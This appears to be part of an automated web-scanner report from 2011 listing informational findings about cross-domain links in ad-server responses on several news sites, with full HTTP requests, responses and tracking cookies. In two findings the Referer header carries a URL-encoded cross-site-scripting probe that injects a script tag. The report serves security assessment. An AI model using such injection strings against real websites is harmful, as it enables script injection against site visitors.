a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
OO-FMTG-EN-USD-000-00000-00000" onFocus="ss('go to www.fuzemeeting.com','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to www.fuzemeeting.com','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CJrdwYTpkLaL_AEQrAIY-gEyCFZRIlNwD8w9" border="0" width="300" onload="(function(that){function c(b,a,d){if(b&&a)if(b.height>0){a.style.top=0;a.style.visibility='visible'}else setTimeout(function(){c(b,a,d*2)},d)}c(that,document.getElementById('abgc'),10);})(this);" /></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.fuzemeeting.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHyFwjf5Hm_14JOooJV1SaFTTwEfw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110719/abg.js"></script>
...[SNIP]...

11.5. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;tile=2;sz=300x250;ord=2401? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 7459
Date: Mon, 12 Sep 2011 12:48:15 GMT

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.nytimesknownow.com%26adT%3DConterterrorism%2BCourse%26adU%3DMarketResearch.com/Venezuela_Oil%26adT%3DVenezuela%2BOil%2BIndustry%26adU%3Damericanprogress.org%26adT%3DSharia%2BLaw%2Bin%2Bthe%2BU.S.%26gl%3DUS&amp;usg=AFQjCNFZK7l-Owc3GDBhcZkplxBK8FGsbA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

11.6. http://ad.doubleclick.net/adj/mansueto.fc/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=336x150,336x210;pos=bot;dcove=d;tile=6;rasegs=seg2;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=37529191382432140? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 513
Date: Mon, 12 Sep 2011 13:06:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/e;245030996;0-0;0;69635154;18754-336/150;43598233/43616020/1;;~aopt=0/ff/c8/ff;~fdr=244396648;0-0;0;42089989;18754-336/150;43600317/43618104/1;;~aopt=2/0/c8/0;~sscs=%3fhttp://www.fastcompany.com/tag/fast-talk?utm_campaign=PbCCM2011&utm_source=Fast Company&utm_medium=PromoUnit&utm_content=336x150"><img src="http://s0.2mdn.net/viewad/2709522/336x150-fast-talk-8.11.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.7. http://ad.doubleclick.net/adj/mansueto.fc/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=728x90;pos=top;dcove=d;tile=2;rasegs=seg2;dcopt=ist;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=37529191382432140? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1163
Date: Mon, 12 Sep 2011 13:06:08 GMT

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3
...[SNIP]...
3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/CNT/go/334302974/direct/01/4245069" target="_blank"><img src="http://view.atdmt.com/CNT/view/334302974/direct/01/4245069"/></a>
...[SNIP]...

11.8. http://ad.doubleclick.net/adj/mansueto.fc/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=728x90;pos=top;dcove=d;tile=2;;dcopt=ist;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1163
Date: Mon, 12 Sep 2011 12:47:56 GMT

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3
...[SNIP]...
3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/CNT/go/334302974/direct/01/1829737" target="_blank"><img src="http://view.atdmt.com/CNT/view/334302974/direct/01/1829737"/></a>
...[SNIP]...

11.9. http://ad.doubleclick.net/adj/mansueto.fc/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=4;;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 331
Date: Mon, 12 Sep 2011 12:47:59 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/b;225907858;0-0;0;42089989;4307-300/250;43506154/43523941/1;;~aopt=2/0/c8/0;~sscs=%3fhttps://magazine.fastcompany.com/loc/FST/300"><img src="http://s0.2mdn.net/viewad/2284073/1-fst-progressive-300x250.gif" border=0 alt="click here"></a>
...[SNIP]...

11.10. http://ad.doubleclick.net/adj/mansueto.fc/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=336x150,336x210;pos=bot_two;dcove=d;tile=7;;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 334
Date: Mon, 12 Sep 2011 12:48:06 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/v;226198159;0-0;0;42089989;18754-336/150;42312632/42330419/1;;~aopt=2/0/c8/0;~sscs=%3fhttp://www.fastcompany.com/editorial-spotlight"><img src="http://s0.2mdn.net/viewad/1256564/336x150-editspotlight-rev.gif" border=0 alt="click here"></a>
...[SNIP]...

11.11. http://ad.doubleclick.net/adj/mansueto.fc/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mansueto.fc/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/mansueto.fc/homepage;sz=1x1;pos=top;dcove=d;tile=1;;lan=en;c_type=homepage;chn=homepage;cms=homepage;ord=3257186268456280? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 256
Date: Mon, 12 Sep 2011 12:47:55 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/e;44306;0-0;0;42089989;31-1/1;0/0/0;;~aopt=2/0/c8/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.12. http://ad.doubleclick.net/adj/n6747.popsci/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=frame1;sz=121x45,300x100;tile=9;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 324
Date: Mon, 12 Sep 2011 12:48:30 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/z;245075708;0-0;1;62626846;3823-300/100;43615919/43633706/1;;~sscs=%3fhttp://www.youtube.com/apmodelshoot"><img src="http://s0.2mdn.net/viewad/3092574/MS_300x100-Banner_YT_Aug11.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.13. http://ad.doubleclick.net/adj/n6747.popsci/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=top1;sz=200x90;tile=2;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 325
Date: Mon, 12 Sep 2011 12:48:19 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/t;244515143;0-0;1;62626846;969-200/90;43615620/43633407/1;;~sscs=%3fhttp://www.popsci.com/digital-bannerads"><img src="http://s0.2mdn.net/viewad/3301884/1-pop_ipad_200x90_08.2011.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.14. http://ad.doubleclick.net/adj/n6747.popsci/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=bottom;sz=728x90;tile=13;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 331
Date: Mon, 12 Sep 2011 12:48:40 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/v;239752611;3-0;1;62626846;3454-728/90;41610042/41627829/1;;~sscs=%3fhttp://www.replayphotos.com/popularsciencephotostore/"><img src="http://s0.2mdn.net/viewad/3092574/rp_PopSci_728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.15. http://ad.doubleclick.net/adj/n6747.popsci/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=x89;sz=94x90;tile=3;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 244
Date: Mon, 12 Sep 2011 12:48:20 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/z;44306;0-0;0;62626846;41575-94/90;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.16. http://ad.doubleclick.net/adj/n6747.popsci/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=right1;sz=300x250,300x600;tile=8;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 331
Date: Mon, 12 Sep 2011 12:48:29 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/k;239752787;0-0;1;62626846;4307-300/250;43697023/43714810/1;;~sscs=%3fhttp://www.americanphotomag.com/modelshoot"><img src="http://s0.2mdn.net/viewad/3092574/1-ModelShoot_300x250_aug11.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.17. http://ad.doubleclick.net/adj/n6747.popsci/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/n6747.popsci/home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/n6747.popsci/home;pos=right2;sz=300x250,300x600;tile=11;ord=1688890654? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 328
Date: Mon, 12 Sep 2011 12:48:37 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/r;239752954;2-0;1;62626846;4307-300/250;43004939/43022726/1;;~sscs=%3fhttp://www.mentorseries.com/treks/2011/hawaii-2011"><img src="http://s0.2mdn.net/viewad/3092574/Hawaii-7-1-2011.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.18. http://ad.doubleclick.net/adj/uk.mtv/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.mtv/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/uk.mtv/homepage;sec0=_hp;sec1=none;secN=none;search_kw=null;match_kw=null;overlay=1;layer=0;sky=1;mpu=1;region=other;sky_res=1;log=0;demo=none;event=none;search_kw=none;vid=none;vid_type=none;region=none;url=/;sz=970x66;tile=2;dcove=d;ord=485257493844255800? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 247
Date: Mon, 12 Sep 2011 12:48:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/f;44306;0-0;0;33841120;31670-970/66;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.19. http://ad.doubleclick.net/adj/uk.mtv/homepage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.mtv/homepage

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/uk.mtv/homepage;sec0=_hp;sec1=none;secN=none;search_kw=null;match_kw=null;overlay=1;layer=0;sky=1;mpu=1;adtype=overlay;region=other;sky_res=1;as_connect=none;log=0;demo=none;event=none;search_kw=none;vid=none;vid_type=none;region=none;dcove=d;url=/;sz=1x1;tile=4;dcopt=ist;ord=485257493844255800? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 289
Date: Mon, 12 Sep 2011 12:48:56 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b80/0/0/%2a/r;212419339;0-0;1;33841120;31-1/1;30462814/30480691/1;;~sscs=%3fhttp://www.mtv.co.uk"><img src="http://s0.2mdn.net/viewad/1654860/overlaydef.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

11.20. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; 
